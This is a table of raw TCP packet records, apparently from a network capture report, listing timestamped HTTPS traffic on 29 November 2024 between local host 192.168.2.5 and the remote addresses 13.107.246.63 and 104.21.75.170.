                                                                                                                            Nov 29, 2024 08:31:14.869048119 CET49809443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:14.869060993 CET4434980913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:14.871567965 CET49814443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:14.871594906 CET4434981413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:14.871795893 CET49814443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:14.871795893 CET49814443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:14.871818066 CET4434981413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:14.883759022 CET4434981213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:14.884203911 CET49812443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:14.884212017 CET4434981213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:14.884695053 CET49812443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:14.884697914 CET4434981213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:14.905209064 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.013312101 CET4434981013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.013394117 CET4434981013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.013678074 CET49810443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.013678074 CET49810443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.013768911 CET49810443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.013784885 CET4434981013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.016469955 CET49815443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.016516924 CET4434981513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.016683102 CET49815443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.016763926 CET49815443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.016772032 CET4434981513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.020862103 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.020884037 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.021035910 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.021040916 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.023014069 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.027687073 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.027700901 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.027880907 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.027883053 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.028062105 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.037535906 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.037549973 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.037688971 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.037692070 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.038074970 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.045777082 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.045792103 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.046052933 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.046056986 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.046205044 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.051333904 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.051347017 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.051830053 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.051832914 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.055553913 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.059930086 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.059946060 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.060017109 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.060019970 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.060065031 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.067111015 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.067125082 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.067256927 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.067260027 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.068149090 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.075217962 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.075232983 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.075300932 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.075304031 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.075407982 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.222902060 CET4434981113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.223076105 CET4434981113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.223222017 CET49811443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.223397017 CET49811443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.223397017 CET49811443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.223413944 CET4434981113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.223423004 CET4434981113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.228101015 CET49816443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.228125095 CET4434981613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.228199959 CET49816443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.228406906 CET49816443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.228419065 CET4434981613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.231580019 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.231596947 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.231689930 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.231693983 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.231741905 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.238265038 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.238280058 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.238353968 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.238357067 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.238589048 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.240536928 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.240648985 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.248795986 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.248815060 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.248908043 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.248908043 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.248912096 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.252240896 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.256896973 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.256911039 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.256969929 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.256973028 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.257158995 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.258065939 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.258152008 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.265737057 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.265750885 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.265861034 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.265863895 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.268183947 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.272897959 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.272912025 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.273006916 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.273010015 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.273247004 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.281125069 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.281136990 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.281225920 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.281229019 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.281693935 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.338671923 CET4434981213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.338763952 CET4434981213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.339234114 CET49812443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.339234114 CET49812443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.339365005 CET49812443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.339384079 CET4434981213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.343988895 CET49817443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.344048023 CET4434981713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.344192982 CET49817443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.355050087 CET49817443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:15.355066061 CET4434981713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.437699080 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.437746048 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.437839031 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.437851906 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.438209057 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.445161104 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.445175886 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.445272923 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.445272923 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.445276976 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.445492029 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.452316999 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.452332973 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.452416897 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.452421904 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.452446938 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.452630997 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.460459948 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.460474014 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.460583925 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.460587978 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.460789919 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.468672037 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.468686104 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.468826056 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.468830109 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.468893051 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.476315022 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.476330042 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.476380110 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.476382971 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.476448059 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.476448059 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.484615088 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.484635115 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.484697104 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.484700918 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.484746933 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.484746933 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.490550041 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.490595102 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.490628958 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.490637064 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.490650892 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.498871088 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.498902082 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.498992920 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.498992920 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.499001980 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.545654058 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.654645920 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.654670000 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.654747963 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.654759884 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.654788017 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.654808998 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.661761999 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.661777020 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.661864042 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.661864042 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.661869049 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.661914110 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.669984102 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.669996977 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.670082092 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.670085907 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.670164108 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.678097010 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.678124905 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.678160906 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.678164959 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.678217888 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.678217888 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.682818890 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.682936907 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.682940960 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.690489054 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.690504074 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.690608978 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.690613031 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.698729992 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.698745012 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.698837042 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.698837042 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.698843956 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.705895901 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.705910921 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.706001043 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.706001043 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.706007957 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.748775005 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.861605883 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.861639977 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.861705065 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.861717939 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.861753941 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.869787931 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.869805098 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.869852066 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.869857073 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.869904041 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.876979113 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.876996994 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.877072096 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.877075911 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.877119064 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.879194021 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.879251957 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.886257887 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.886298895 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.886364937 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.886364937 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.886373997 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.886415958 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.893464088 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.893495083 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.893522978 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.893527985 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.893557072 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.893574953 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.898130894 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.898219109 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.904624939 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.904647112 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.904697895 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.904704094 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.912754059 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.912775993 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.912816048 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:15.912821054 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:15.912873983 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.069365978 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.069392920 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.069463968 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.069477081 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.069525003 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.075756073 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.075782061 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.075845957 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.075855970 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.075906992 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.075906992 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.083880901 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.083900928 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.083933115 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.083940983 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.083971024 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.083988905 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.092103004 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.092118025 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.092174053 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.092178106 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.092216969 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.099278927 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.099293947 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.099339962 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.099344969 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.099383116 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.108017921 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.108031988 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.108108997 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.108113050 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.108175039 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.113955021 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.114017963 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.114032984 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.114063025 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.114129066 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.122256041 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.122271061 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.122311115 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.122314930 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.122345924 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.130367994 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.130389929 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.130441904 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.130445957 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.130491018 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:16.235008001 CET4434981313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.244740963 CET49813443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:16.244817019 CET4434981313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.245316029 CET49813443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:16.245332956 CET4434981313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.285058022 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.285077095 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:16.285141945 CET49797443192.168.2.5104.21.75.170
